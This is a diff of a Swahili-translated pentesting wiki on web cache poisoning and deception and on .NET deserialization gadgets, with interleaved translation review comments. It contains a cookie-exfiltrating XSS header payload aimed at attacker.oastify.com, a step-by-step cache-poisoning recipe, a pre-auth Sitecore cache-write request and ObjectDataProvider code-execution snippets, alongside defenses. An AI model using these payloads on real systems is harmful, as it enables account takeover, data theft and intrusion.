- Tabia za mtiririko wa ombi ziliruhusu ombi la njia ya `.js` kuathiri ufunguo/variant wa cache uliohitajika kwa HTML kuu inayofuata, ikiruhusu XSS ya mtumiaji-mwingine kupitia reflection ya kichwa.
|
||||
- HTML kuu iliakisi header ya request isiyoaminika (kwa mfano, `User-Agent`) ndani ya executable context.
|
||||
- CDN iliondoa cache headers lakini kulikuwepo cache ya internal/origin. CDN pia ili-auto-cache requests zinazomalizika kwa extensions za static (kwa mfano, `.js`), wakati WAF ilitumia ukaguzi mdogo wa maudhui kwa GETs za static assets.
|
||||
- Mabadiliko ya mtiririko wa requests yaliwezesha request kwa njia ya `.js` kuathiri cache key/variant iliyotumika kwa HTML kuu iliyofuata, hivyo kuwezesha cross-user XSS kupitia header reflection.
|
||||
|
||||
Mapishi ya vitendo (iliyoshuhudiwa katika CDN/WAF maarufu):
|
||||
Mapishi ya vitendo (iliyoshuhudiwa kwenye CDN/WAF maarufu):
|
||||
|
||||
1) Kutoka kwa IP safi (epuka kupunguzwa kwa sifa za awali), weka `User-Agent` mbaya kupitia kivinjari au Burp Proxy Match & Replace.
|
||||
2) Katika Burp Repeater, andaa kundi la maombi mawili na tumia "Send group in parallel" (mode ya pakiti moja inafanya kazi bora):
|
||||
- Ombi la kwanza: GET rasilimali ya njia ya `.js` kwenye asili hiyo hiyo huku ukituma `User-Agent` wako mbaya.
|
||||
- Mara moja baada ya: GET ukurasa kuu (`/`).
|
||||
3) Mbio za urambazaji za CDN/WAF pamoja na `.js` iliyohifadhiwa moja kwa moja mara nyingi huzaa variant ya HTML iliyoharibiwa ambayo kisha inatolewa kwa wageni wengine wanaoshiriki hali sawa za ufunguo wa cache (mfano, vipimo sawa vya `Vary` kama `User-Agent`).
|
||||
1) Kutoka IP safi (epuka prior reputation-based downgrades), weka `User-Agent` yenye uhasama kupitia browser au Burp Proxy Match & Replace.
|
||||
2) Katika Burp Repeater, andaa kundi la requests mbili na tumia "Send group in parallel" (single-packet mode works best):
|
||||
- Request ya kwanza: GET njia ya rasilimali ya `.js` kwenye origin ileile huku ukituma `User-Agent` yako yenye uhasama.
|
||||
- Mara moja baada yake: GET ukurasa mkuu (`/`).
|
||||
3) Mbio za routing za CDN/WAF pamoja na `.js` iliyohifadhiwa kwa otomatiki mara nyingi huzaa variant ya HTML iliyopoisona katika cache ambayo kisha hutumika kwa wageni wengine wanaoshiriki masharti yale yale ya cache key (kwa mfano, same `Vary` dimensions like `User-Agent`).
|
||||
|
||||
Mfano wa payload ya kichwa (kuondoa vidakuzi visivyo na HttpOnly):
|
||||
Mfano wa header payload (to exfiltrate non-HttpOnly cookies):
|
||||
```
|
||||
User-Agent: Mo00ozilla/5.0</script><script>new Image().src='https://attacker.oastify.com?a='+document.cookie</script>"
|
||||
```
|
||||
Operational tips:
|
||||
|
||||
- CDNs nyingi huficha vichwa vya cache; uchafuzi unaweza kuonekana tu kwenye mizunguko ya kusasisha ya masaa mengi. Tumia IP nyingi za mtazamo na punguza kasi ili kuepuka mipaka ya kiwango au vichocheo vya sifa.
|
||||
- Kutumia IP kutoka wingu la CDN yenyewe wakati mwingine huongeza uthabiti wa routing.
|
||||
- Ikiwa CSP kali ipo, hii bado inafanya kazi ikiwa kutafakari kunatekelezwa katika muktadha wa HTML kuu na CSP inaruhusu utekelezaji wa ndani au inakwepa kwa muktadha.
|
||||
- CDNs nyingi huficha cache headers; poisoning inaweza kuonekana tu kwenye mizunguko ya refresh ya masaa mengi. Tumia multiple vantage IPs na throttle ili kuepuka rate-limit au reputation triggers.
|
||||
- Kutumia IP kutoka cloud ya CDN mwenyewe wakati mwingine huboresha routing consistency.
|
||||
- Ikiwa kuna CSP kali, bado inafanya kazi ikiwa reflection inaendeshwa katika main HTML context na CSP inaruhusu inline execution au inapitiwa na context.
|
||||
|
||||
Impact:
|
||||
|
||||
- Ikiwa kuki za kikao si `HttpOnly`, ATO isiyo na bonyeza moja inawezekana kwa kuhamasisha kwa wingi `document.cookie` kutoka kwa watumiaji wote wanaopatiwa HTML iliyochafuliwa.
|
||||
- Ikiwa session cookies si `HttpOnly`, zero-click ATO inawezekana kwa mass-exfiltrating `document.cookie` kutoka kwa watumiaji wote wanaopokelewa poisoned HTML.
|
||||
|
||||
Defenses:
|
||||
|
||||
- Acha kutafakari vichwa vya ombi ndani ya HTML; encode muktadha kwa ukali ikiwa haiwezekani. Patanisha sera za cache za CDN na asili na kuepuka kutofautiana kwenye vichwa visivyoaminika.
|
||||
- Hakikisha WAF inatumika ukaguzi wa maudhui kwa usawa kwa maombi ya `.js` na njia za statiki.
|
||||
- Weka `HttpOnly` (na `Secure`, `SameSite`) kwenye kuki za kikao.
|
||||
- Acha ku-reflect request headers ndani ya HTML; context-encode kwa ukali ikiwa haiwezi kuepukika. Linganisha sera za cache za CDN na origin na epuka ku-vary kwa headers zisizoaminika.
|
||||
- Hakikisha WAF inatumia content inspection kwa uthabiti kwa `.js` requests na static paths.
|
||||
- Weka `HttpOnly` (na `Secure`, `SameSite`) kwenye session cookies.
|
||||
|
||||
## Vulnerable Examples
|
||||
### Sitecore pre‑auth HTML cache poisoning (unsafe XAML Ajax reflection)
|
||||
|
||||
Mfumo maalum wa Sitecore huruhusu uandishi usioidhinishwa kwenye HtmlCache kwa kutumia vibaya pre‑auth XAML handlers na AjaxScriptManager reflection. Wakati handler ya `Sitecore.Shell.Xaml.WebControl` inafikiwa, `xmlcontrol:GlobalHeader` (iliyotokana na `Sitecore.Web.UI.WebControl`) inapatikana na wito wa reflective ufuatao unaruhusiwa:
|
||||
```
|
||||
POST /-/xaml/Sitecore.Shell.Xaml.WebControl
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
__PARAMETERS=AddToCache("key","<html>…payload…</html>")&__SOURCE=ctl00_ctl00_ctl05_ctl03&__ISEVENT=1
|
||||
```
|
||||
Hii inaandika HTML yoyote chini ya cache key iliyochaguliwa na mshambuliaji, ikiruhusu precise poisoning mara cache keys zinapojulikana.
|
||||
|
||||
For full details (cache key construction, ItemService enumeration and a chained post‑auth deserialization RCE):
|
||||
|
||||
{{#ref}}
|
||||
../../network-services-pentesting/pentesting-web/sitecore/README.md
|
||||
{{#endref}}
|
||||
|
||||
## Mifano Inayoweza Kuathiriwa
|
||||
|
||||
### Apache Traffic Server ([CVE-2021-27577](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27577))
|
||||
|
||||
ATS ilituma kipande ndani ya URL bila kukiondoa na kuunda ufunguo wa cache kwa kutumia tu mwenyeji, njia na swali (ikikosa kipande). Hivyo ombi `/#/../?r=javascript:alert(1)` lilitumwa kwa backend kama `/#/../?r=javascript:alert(1)` na ufunguo wa cache haukuwa na mzigo ndani yake, tu mwenyeji, njia na swali.
|
||||
ATS ilituma fragment ndani ya URL bila kuiondoa na ikatengeneza cache key ikitumia tu host, path na query (ikisingiza fragment). Hivyo ombi `/#/../?r=javascript:alert(1)` lilitumwa kwa backend kama `/#/../?r=javascript:alert(1)` na cache key haikuwa na payload ndani yake, ilikuwa na host, path na query tu.
|
||||
|
||||
### GitHub CP-DoS
|
||||
|
||||
Kutuma thamani mbaya katika kichwa cha aina ya maudhui kulisababisha jibu la 405 lililohifadhiwa. Ufunguzi wa cache ulijumuisha kuki hivyo ilikuwa inawezekana kushambulia watumiaji wasio na uthibitisho.
|
||||
Kutuma thamani mbaya kwenye content-type header ilisababisha response ya 405 iliyohifadhiwa (cached). Cache key ilijumuisha cookie hivyo ilikuwa inawezekana kushambulia tu unauth users.
|
||||
|
||||
### GitLab + GCP CP-DoS
|
||||
|
||||
GitLab inatumia ndoo za GCP kuhifadhi maudhui ya statiki. **Ndoo za GCP** zinasaidia **kichwa `x-http-method-override`**. Hivyo ilikuwa inawezekana kutuma kichwa `x-http-method-override: HEAD` na kuchafua cache ili irejeshe mwili wa jibu tupu. Pia inaweza kusaidia njia `PURGE`.
|
||||
GitLab inatumia GCP buckets kuhifadhi static content. **GCP Buckets** zinaunga mkono header **`x-http-method-override`**. Kwa hivyo ilikuwa inawezekana kutuma header `x-http-method-override: HEAD` na poison the cache ili irudishe response body tupu. Pia inaweza kusaidia method `PURGE`.
|
||||
|
||||
### Rack Middleware (Ruby on Rails)
|
||||
|
||||
Katika programu za Ruby on Rails, middleware ya Rack mara nyingi hutumiwa. Kusudi la msimbo wa Rack ni kuchukua thamani ya kichwa cha **`x-forwarded-scheme`** na kuipatia kama mpango wa ombi. Wakati kichwa `x-forwarded-scheme: http` kinatumwa, uelekeo wa 301 unafanyika kwa eneo hilo hilo, huenda kusababisha Kukataliwa kwa Huduma (DoS) kwa rasilimali hiyo. Zaidi ya hayo, programu inaweza kutambua kichwa cha `X-forwarded-host` na kuwarudisha watumiaji kwa mwenyeji uliotajwa. Tabia hii inaweza kusababisha kupakia faili za JavaScript kutoka kwa seva ya mshambuliaji, ikileta hatari ya usalama.
|
||||
Katika applications za Ruby on Rails, Rack middleware mara nyingi hutumika. Kusudi la code ya Rack ni kuchukua thamani ya header **`x-forwarded-scheme`** na kuiweka kama scheme ya request. Wakati header `x-forwarded-scheme: http` inapotumwa, hutokea redirect ya 301 kwenda eneo lile lile, jambo ambalo linaweza kusababisha Denial of Service (DoS) kwa rasilimali hiyo. Zaidi ya hayo, application inaweza kutambua header `X-forwarded-host` na kuwarudisha watumiaji kwenye host iliyotajwa. Tabia hii inaweza kusababisha kupakia kwa faili za JavaScript kutoka kwenye server ya mshambuliaji, na hivyo kuleta hatari ya usalama.
|
||||
|
||||
### 403 na Ndoo za Hifadhi
|
||||
### 403 and Storage Buckets
|
||||
|
||||
Cloudflare hapo awali ilihifadhi majibu ya 403. Kujaribu kufikia S3 au Azure Storage Blobs kwa vichwa vya Uidhinishaji visivyo sahihi kutasababisha jibu la 403 ambalo lilihifadhiwa. Ingawa Cloudflare imeacha kuhifadhi majibu ya 403, tabia hii inaweza bado kuwepo katika huduma zingine za proxy.
|
||||
Cloudflare hapo awali ilihakikisha (cached) majibu ya 403. Kujaribu kufikia S3 au Azure Storage Blobs kwa Authorization headers zisizo sahihi kungepelekea jibu la 403 ambalo lilihifadhiwa. Ingawa Cloudflare imeacha caching ya majibu ya 403, tabia hii inaweza bado kuwepo katika proxy services zingine.
|
||||
|
||||
### Injecting Keyed Parameters
|
||||
|
||||
Caches mara nyingi hujumuisha vigezo maalum vya GET katika ufunguo wa cache. Kwa mfano, Varnish ya Fastly ilihifadhi vigezo vya `size` katika maombi. Hata hivyo, ikiwa toleo lililosajiliwa la parameter (mfano, `siz%65`) pia lilitumwa na thamani isiyo sahihi, ufunguo wa cache ungejengwa kwa kutumia parameter sahihi ya `size`. Walakini, backend ingepitia thamani katika parameter iliyoandikwa. Kuandika upya parameter ya pili ya `size` kulisababisha kuondolewa kwake na cache lakini matumizi yake na backend. Kuweka thamani ya 0 kwa parameter hii kulisababisha kosa la 400 Bad Request linaloweza kuhifadhiwa.
|
||||
Caches mara nyingi hujumuisha parameters maalum za GET kwenye cache key. Kwa mfano, Varnish ya Fastly ilihakikisha parameter ya `size` katika requests. Hata hivyo, kama toleo lililotumwa kwa URL-encoding la parameter (mfano, `siz%65`) lililetwa pia na thamani isiyo sahihi, cache key ingejengwa kwa kutumia parameter sahihi ya `size`. Hata hivyo, backend itashughulikia thamani katika parameter iliyokuwa URL-encoded. Kufanya URL-encoding kwa parameter ya pili `size` kulisababisha kutokujumuishwa kwake na cache lakini kutumika na backend. Kuipa thamani ya 0 parameter hii kulipelekea kosa la 400 Bad Request ambalo lingeweza kuhifadhiwa na cache.
|
||||
|
||||
### User Agent Rules
|
||||
|
||||
Wajenzi wengine huzuia maombi na wakala wa mtumiaji wanaofanana na wale wa zana zenye trafiki kubwa kama FFUF au Nuclei ili kudhibiti mzigo wa seva. Kwa bahati mbaya, mbinu hii inaweza kuleta udhaifu kama vile uchafuzi wa cache na DoS.
|
||||
Baadhi ya developers huzuia requests zenye user-agents zinazolingana na zana za trafiki kubwa kama FFUF au Nuclei ili kudhibiti mzigo wa server. Kwa uwazi, njia hii inaweza kuleta udhaifu kama cache poisoning na DoS.
|
||||
|
||||
### Illegal Header Fields
|
||||
|
||||
[RF7230](https://datatracker.ietf.mrg/doc/html/rfc7230) inabainisha wahusika wanaokubalika katika majina ya vichwa. Vichwa vinavyokuwa na wahusika nje ya anuwai ya **tchar** vinapaswa kwa kawaida kusababisha jibu la 400 Bad Request. Katika mazoezi, seva hazifuati viwango hivi kila wakati. Mfano maarufu ni Akamai, ambayo inasambaza vichwa vyenye wahusika batili na kuhifadhi kosa lolote la 400, mradi tu kichwa cha `cache-control` hakipo. Mfano wa kutumika ulitambuliwa ambapo kutuma kichwa chenye wahusika haramu, kama `\`, kutasababisha kosa la 400 Bad Request linaloweza kuhifadhiwa.
|
||||
[https://datatracker.ietf.mrg/doc/html/rfc7230](https://datatracker.ietf.mrg/doc/html/rfc7230) inabainisha characters zinazoruhusiwa kwenye header names. Headers zenye characters zisizo ndani ya range ya **tchar** kwa kawaida zinapaswa kusababisha jibu la 400 Bad Request. Katika utekelezaji, servers si kila wakati zinafuata standard hii. Mfano muhimu ni Akamai, ambayo inapeleka headers zenye characters zisizo halali na inahifadhi (cache) kosa lolote la 400, mradi tu header `cache-control` haipo. Muundo unaoweza kutumika ulitambuliwa ambapo kutuma header yenye character isiyokubalika, kama `\`, kungepelekea kosa la 400 Bad Request linaloweza kuhifadhiwa na cache.
|
||||
|
||||
### Finding new headers
|
||||
### Kupata headers mpya
|
||||
|
||||
[https://gist.github.com/iustin24/92a5ba76ee436c85716f003dda8eecc6](https://gist.github.com/iustin24/92a5ba76ee436c85716f003dda8eecc6)
|
||||
|
||||
## Cache Deception
|
||||
|
||||
Lengo la Cache Deception ni kuwafanya wateja **kupakia rasilimali ambazo zitahifadhiwa na cache zikiwa na taarifa zao nyeti**.
|
||||
The goal of Cache Deception is to make clients **load resources that are going to be saved by the cache with their sensitive information**.
|
||||
|
||||
Kwanza kabisa kumbuka kwamba **nyongeza** kama vile `.css`, `.js`, `.png` nk kwa kawaida **zimepangwa** kuhifadhiwa katika **cache.** Hivyo, ikiwa unapata `www.example.com/profile.php/nonexistent.js` cache itahifadhi jibu kwa sababu inaona nyongeza ya `.js`. Lakini, ikiwa **programu** inarejelea na maudhui ya **nyeti** ya mtumiaji yaliyohifadhiwa katika _www.example.com/profile.php_, unaweza **kuiba** maudhui hayo kutoka kwa watumiaji wengine.
|
||||
Kwanza kumbuka kwamba **extensions** kama `.css`, `.js`, `.png` n.k. kawaida huwa **configured** kuhifadhiwa katika **cache.** Kwa hivyo, ikiwa utafikia `www.example.com/profile.php/nonexistent.js` cache inaweza kuhifadhi response kwa sababu inaona `.js` **extension**. Lakini, ikiwa **application** inarudisha maudhui nyeti ya mtumiaji yaliyohifadhiwa katika _www.example.com/profile.php_, unaweza **kuiba** yale maudhui kutoka kwa watumiaji wengine.
|
||||
|
||||
Mambo mengine ya kujaribu:
|
||||
|
||||
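Review bot: the RFC 7230 link in the "Illegal Header Fields" paragraph is broken in both the old and the new line, `https://datatracker.ietf.mrg/doc/html/rfc7230` should be `https://datatracker.ietf.org/doc/html/rfc7230`, and the new line also drops the `RFC7230` link text in favour of the bare (wrong) URL; fix the domain and keep `[RFC7230](...)` as the link text. Two translation regressions in the same hunk change the meaning: in "User Agent Rules" the old "Kwa bahati mbaya" (unfortunately) became "Kwa uwazi" (clearly), and in the Cloudflare 403 and Fastly `size` paragraphs "cached" is now rendered as "ilihakikisha" (verified/ensured), where the old "ilihifadhi" was correct. Finally the Cache Deception intro ("The goal of Cache Deception is to make clients...") has been reverted to English while the rest of the section stays in Swahili; restore the translated sentence.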
@ -248,19 +268,19 @@ Mambo mengine ya kujaribu:
|
||||
- _www.example.com/profile.php/test.js_
|
||||
- _www.example.com/profile.php/../test.js_
|
||||
- _www.example.com/profile.php/%2e%2e/test.js_
|
||||
- _Tumia nyongeza zisizojulikana kama_ `.avif`
|
||||
- _Tumia extensions zisizojulikana kama_ `.avif`
|
||||
|
||||
Mfano mwingine wazi sana unaweza kupatikana katika andiko hili: [https://hackerone.com/reports/593712](https://hackerone.com/reports/593712).\
|
||||
Katika mfano, inaelezwa kwamba ikiwa unapata ukurasa usio na kuwepo kama _http://www.example.com/home.php/non-existent.css_ maudhui ya _http://www.example.com/home.php_ (**pamoja na taarifa nyeti za mtumiaji**) yatarudishwa na seva ya cache itahifadhi matokeo.\
|
||||
Kisha, **mshambuliaji** anaweza kufikia _http://www.example.com/home.php/non-existent.css_ kwenye kivinjari chao na kuona **taarifa za siri** za watumiaji ambao walifika hapo awali.
|
||||
Another very clear example can be found in this write-up: [https://hackerone.com/reports/593712](https://hackerone.com/reports/593712).\
|
||||
Katika mfano, inafafanuliwa kuwa ikiwa unapakia ukurasa usiopo kama _http://www.example.com/home.php/non-existent.css_ yaliyomo ya _http://www.example.com/home.php_ (**yenye taarifa nyeti za mtumiaji**) yatarudishwa na server ya cache itahifadhi matokeo.\
|
||||
Kisha, **attacker** anaweza kufikia _http://www.example.com/home.php/non-existent.css_ kwenye kivinjari chake na kuona **taarifa za siri** za watumiaji waliotembelea hapo awali.
|
||||
|
||||
Kumbuka kwamba **cache proxy** inapaswa kuwa **imepangwa** kuhifadhi faili **kulingana** na **nyongeza** ya faili (_.css_) na si kulingana na aina ya maudhui. Katika mfano _http://www.example.com/home.php/non-existent.css_ itakuwa na aina ya maudhui ya `text/html` badala ya aina ya mime ya `text/css` (ambayo inatarajiwa kwa faili ya _.css_).
|
||||
Tambua kwamba **cache proxy** inapaswa kuwa **configured** kuhifadhi files **kwa msingi** wa **extension** ya file (_.css_) na siyo msingi wa content-type. Katika mfano _http://www.example.com/home.php/non-existent.css_ itakuwa na content-type `text/html` badala ya `text/css` mime type.
|
||||
|
||||
Jifunze hapa jinsi ya kutekeleza [Cache Deceptions attacks abusing HTTP Request Smuggling](../http-request-smuggling/index.html#using-http-request-smuggling-to-perform-web-cache-deception).
|
||||
Jifunze hapa kuhusu jinsi ya kufanya[ Cache Deceptions attacks abusing HTTP Request Smuggling](../http-request-smuggling/index.html#using-http-request-smuggling-to-perform-web-cache-deception).
|
||||
|
||||
## Automatic Tools
|
||||
## Vifaa Otomatiki
|
||||
|
||||
- [**toxicache**](https://github.com/xhzeem/toxicache): Skana ya Golang kutafuta udhaifu wa uchafuzi wa cache ya wavuti katika orodha ya URLs na kujaribu mbinu mbalimbali za kuingiza.
|
||||
- [**toxicache**](https://github.com/xhzeem/toxicache): Golang scanner to find web cache poisoning vulnerabilities in a list of URLs and test multiple injection techniques.
|
||||
|
||||
## References
|
||||
|
||||
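Review bot: the link in "Jifunze hapa kuhusu jinsi ya kufanya[ Cache Deceptions attacks abusing HTTP Request Smuggling](...)" has the opening bracket glued to the previous word and a leading space inside the link text, which renders as a broken link; it should read `... kufanya [Cache Deceptions attacks abusing HTTP Request Smuggling](...)`. The same hunk also reverts two lines to English in an otherwise Swahili page: the hackerone write-up intro ("Another very clear example can be found in this write-up") and the `toxicache` description under "Vifaa Otomatiki"; keep the translated versions from the old lines.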
@ -272,6 +292,7 @@ Jifunze hapa jinsi ya kutekeleza [Cache Deceptions attacks abusing HTTP Request
|
||||
- [https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/](https://www.linkedin.com/pulse/how-i-hacked-all-zendesk-sites-265000-site-one-line-abdalhfaz/)
|
||||
- [How I found a 0-Click Account takeover in a public BBP and leveraged it to access Admin-Level functionalities](https://hesar101.github.io/posts/How-I-found-a-0-Click-Account-takeover-in-a-public-BBP-and-leveraged-It-to-access-Admin-Level-functionalities/)
|
||||
- [Burp Proxy Match & Replace](https://portswigger.net/burp/documentation/desktop/tools/proxy/match-and-replace)
|
||||
- [watchTowr Labs – Sitecore XP cache poisoning → RCE](https://labs.watchtowr.com/cache-me-if-you-can-sitecore-experience-platform-cache-poisoning-to-rce/)
|
||||
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
@ -1,38 +1,38 @@
|
||||
# Msingi wa .Net deserialization (Gadget ya ObjectDataProvider, ExpandedWrapper, na Json.Net)
|
||||
# Basic .Net deserialization (ObjectDataProvider gadget, ExpandedWrapper, and Json.Net)
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
Post hii inajitolea kwa **kuelewa jinsi gadget ya ObjectDataProvider inavyotumiwa** kupata RCE na **jinsi** maktaba za Serialization **Json.Net na xmlSerializer zinaweza kutumika vibaya** na gadget hiyo.
|
||||
Chapisho hili limetengwa kuelewa jinsi gadget ObjectDataProvider inavyotumika kupata RCE na jinsi maktaba za Serialization Json.Net na xmlSerializer zinavyoweza kutumiwa vibaya pamoja na gadget hiyo.
|
||||
|
||||
## Gadget ya ObjectDataProvider
|
||||
## ObjectDataProvider Gadget
|
||||
|
||||
Kutoka kwenye hati: _darasa la ObjectDataProvider linafungua na kuunda kitu ambacho unaweza kutumia kama chanzo cha uhusiano_.\
|
||||
Ndio, ni maelezo ya ajabu, hivyo hebu tuone ni nini darasa hili lina ambacho ni cha kuvutia sana: Darasa hili linaruhusu **kufunga kitu chochote**, kutumia _**MethodParameters**_ kuweka **vigezo vyovyote,** na kisha **kutumia MethodName kuita kazi yoyote** ya kitu chochote kilichotangazwa kwa kutumia vigezo vyovyote.\
|
||||
Hivyo, **kitu** hicho kitafanya **kazi** na **vigezo wakati kinapokuwa kinadeserialized.**
|
||||
From the documentation: _the ObjectDataProvider Class Wraps and creates an object that you can use as a binding source_.
|
||||
Ndiyo, ni maelezo ya kushangaza, hivyo tuone nini darasa hili linao kinachovutia: Darasa hili huruhusu **wrap an arbitrary object**, kutumia _**MethodParameters**_ kuweka vigezo vya aina yoyote, na kisha **tumia MethodName kuitisha function yoyote** ya object iliyotajwa kwa kutumia vigezo hivyo.
|
||||
Kwa hivyo, object yoyote ita**tekeleza** function yenye **parameters** wakati inatengenezwa upya (being deserialized).
|
||||
|
||||
### **Jinsi hii inavyowezekana**
|
||||
### **Jinsi hii inawezekana**
|
||||
|
||||
Namespace ya **System.Windows.Data**, inayopatikana ndani ya **PresentationFramework.dll** katika `C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF`, ndiko ambapo ObjectDataProvider imefafanuliwa na kutekelezwa.
|
||||
The **System.Windows.Data** namespace, found within the **PresentationFramework.dll** at `C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF`, is where the ObjectDataProvider is defined and implemented.
|
||||
|
||||
Kwa kutumia [**dnSpy**](https://github.com/0xd4d/dnSpy) unaweza **kuangalia msimbo** wa darasa tunalolipenda. Katika picha hapa chini tunaona msimbo wa **PresentationFramework.dll --> System.Windows.Data --> ObjectDataProvider --> Jina la njia**
|
||||
Using [**dnSpy**](https://github.com/0xd4d/dnSpy) you can **inspect the code** of the class we are interested in. In the image below we are seeing the code of **PresentationFramework.dll --> System.Windows.Data --> ObjectDataProvider --> Method name**
|
||||
|
||||
.png>)
|
||||
|
||||
Kama unavyoona wakati `MethodName` imewekwa `base.Refresh()` inaitwa, hebu tuangalie inafanya nini:
|
||||
Kama unavyoona, wakati `MethodName` inawekwa `base.Refresh()` inaitwa; tuchukulie tuangalie inafanya nini:
|
||||
|
||||
.png>)
|
||||
|
||||
Sawa, hebu tuendelee kuona `this.BeginQuery()` inafanya nini. `BeginQuery` imezuiliwa na `ObjectDataProvider` na hii ndiyo inafanya:
|
||||
Sawa, tuendelee kuona `this.BeginQuery()` inafanya nini. `BeginQuery` imeoverride na `ObjectDataProvider` na hapa ndilo linachofanya:
|
||||
|
||||
.png>)
|
||||
|
||||
Kumbuka kwamba mwishoni mwa msimbo inaita `this.QueryWorke(null)`. Hebu tuone inatekeleza nini:
|
||||
Kumbuka mwishoni mwa msimbo inaita `this.QueryWorke(null)`. Tazama inatekeleza nini wakati inaitwa:
|
||||
|
||||
.png>)
|
||||
|
||||
Kumbuka kwamba hii si msimbo kamili wa kazi ya `QueryWorker` lakini inaonyesha sehemu ya kuvutia ya hiyo: Msimbo **unaita `this.InvokeMethodOnInstance(out ex);`** hii ndiyo mistari ambapo **seti ya njia inaitwa**.
|
||||
Kumbuka hii si msimbo kamili wa function `QueryWorker` lakini inaonyesha sehemu ya kuvutia: Msimbo **unaita `this.InvokeMethodOnInstance(out ex);`** — hapa ndilo mstari ambapo **method iliyowekwa inaitwa**.
|
||||
|
||||
Ikiwa unataka kuangalia kwamba kwa kuweka tu _**MethodName**_** itatekelezwa**, unaweza kukimbia msimbo huu:
|
||||
If you want to check that just setting the _**MethodName**_ **it will be executed**, you can run this code:
|
||||
```java
|
||||
using System.Windows.Data;
|
||||
using System.Diagnostics;
|
||||
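Review bot: the sentence "Kwa hivyo, object yoyote ita**tekeleza** function yenye **parameters** wakati inatengenezwa upya" changes the meaning of the source: it is that object (the wrapped instance described by `MethodName`/`MethodParameters`), not any object, that executes the method on deserialization, so "object yoyote" should be "object hiyo". Several lines in this hunk are also left in English in a Swahili document (the page title, the documentation quote "Wraps and creates an object...", the `System.Windows.Data` / `PresentationFramework.dll` paragraph, the dnSpy paragraph and "If you want to check that just setting the MethodName..."), and "tuchukulie tuangalie" is not grammatical ("hebu tuangalie"). Separately, the fence that opens with ```` ```java ```` contains C# (`using System.Windows.Data;`), so the tag should be `csharp`.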
@ -52,16 +52,16 @@ myODP.MethodName = "Start";
|
||||
}
|
||||
}
|
||||
```
|
||||
Kumbuka kwamba unahitaji kuongeza kama rejeleo _C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll_ ili kupakia `System.Windows.Data`
|
||||
Kumbuka kwamba unahitaji kuongeza kama reference _C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\PresentationFramework.dll_ ili kupakia `System.Windows.Data`
|
||||
|
||||
## ExpandedWrapper
|
||||
|
||||
Kwa kutumia exploit iliyotangulia kutakuwa na kesi ambapo **kitu** kitakuwa **kimeondolewa** kama _**ObjectDataProvider**_ mfano (kwa mfano katika DotNetNuke vuln, kwa kutumia XmlSerializer, kitu kiliondolewa kwa kutumia `GetType`). Hivyo, hatutakuwa na **ufahamu wa aina ya kitu kilichofichwa** katika mfano wa _ObjectDataProvider_ (`Process` kwa mfano). Unaweza kupata zaidi [habari kuhusu DotNetNuke vuln hapa](https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=https%3A%2F%2Fpaper.seebug.org%2F365%2F&sandbox=1).
|
||||
Ukitegemea exploit iliyotangulia, kutatokea kesi ambapo the **object** itakayokuwa **deserialized as** mfano wa _**ObjectDataProvider**_ (kwa mfano katika DotNetNuke vuln, kwa kutumia XmlSerializer, object ilideserializa kwa kutumia `GetType`). Kisha, haitakuwa na habari kuhusu aina ya object iliyofungwa ndani ya mfano wa _ObjectDataProvider_ (kwa mfano `Process`). Unaweza kupata [maelezo zaidi kuhusu DotNetNuke vuln hapa](https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=https%3A%2F%2Fpaper.seebug.org%2F365%2F&sandbox=1).
|
||||
|
||||
Darasa hili linaruhusu s**pecify aina za vitu vya vitu vilivyofichwa** katika mfano fulani. Hivyo, darasa hili linaweza kutumika kuficha kitu cha chanzo (_ObjectDataProvider_) ndani ya aina mpya ya kitu na kutoa mali tunazohitaji (_ObjectDataProvider.MethodName_ na _ObjectDataProvider.MethodParameters_).\
|
||||
Hii ni muhimu sana kwa kesi kama ile iliyowasilishwa hapo awali, kwa sababu tutakuwa na uwezo wa **kuficha \_ObjectDataProvider**_** ndani ya mfano wa **_**ExpandedWrapper** \_ na **wakati wa kuondolewa** darasa hili litaunda _**OjectDataProvider**_ kitu ambacho kitafanya **kazi** iliyoonyeshwa katika _**MethodName**_.
|
||||
Class hii inaruhusu **kuainisha aina za object za vitu vinavyofungwa** katika instance fulani. Hivyo, class hii inaweza kutumika kufunga source object (_ObjectDataProvider_) ndani ya aina mpya ya object na kutoa properties tunazohitaji (_ObjectDataProvider.MethodName_ na _ObjectDataProvider.MethodParameters_).\
|
||||
Hii ni muhimu sana kwa kesi kama ile iliyoonyeshwa hapo awali, kwa sababu tutakuwa na uwezo wa **wrap _ObjectDataProvider_ inside an _ExpandedWrapper_ instance** na **when deserialized** class hii itakuwa inafanya **create** object ya _**OjectDataProvider**_ ambayo ita**execute** function iliyoonyeshwa katika _**MethodName**_.
|
||||
|
||||
Unaweza kuangalia wrapper hii kwa kutumia msimbo ufuatao:
|
||||
You can check this wrapper with the following code:
|
||||
```java
|
||||
using System.Windows.Data;
|
||||
using System.Diagnostics;
|
||||
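Review bot: in the ExpandedWrapper paragraph "object ilideserializa kwa kutumia `GetType`" is a garbled verb and "haitakuwa na habari kuhusu aina ya object" loses the subject; the old lines ("kitu kiliondolewa kwa kutumia `GetType`" / "hatutakuwa na ufahamu wa aina ya kitu") carried the intended meaning, that the deserializer does not know the type wrapped inside the `ObjectDataProvider`. The typo `OjectDataProvider` is carried over from the source and should be `ObjectDataProvider`, and "You can check this wrapper with the following code:" is left untranslated while the surrounding text is Swahili.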
@ -85,11 +85,11 @@ myExpWrap.ProjectedProperty0.MethodName = "Start";
|
||||
```
|
||||
## Json.Net
|
||||
|
||||
Katika [ukurasa rasmi](https://www.newtonsoft.com/json) inabainishwa kwamba maktaba hii inaruhusu **Kuhifadhi na kufungua tena kitu chochote cha .NET kwa kutumia serializer wa JSON wenye nguvu wa Json.NET**. Hivyo, ikiwa tunaweza **kufungua tena gadget ya ObjectDataProvider**, tunaweza kusababisha **RCE** kwa kufungua tena kitu.
|
||||
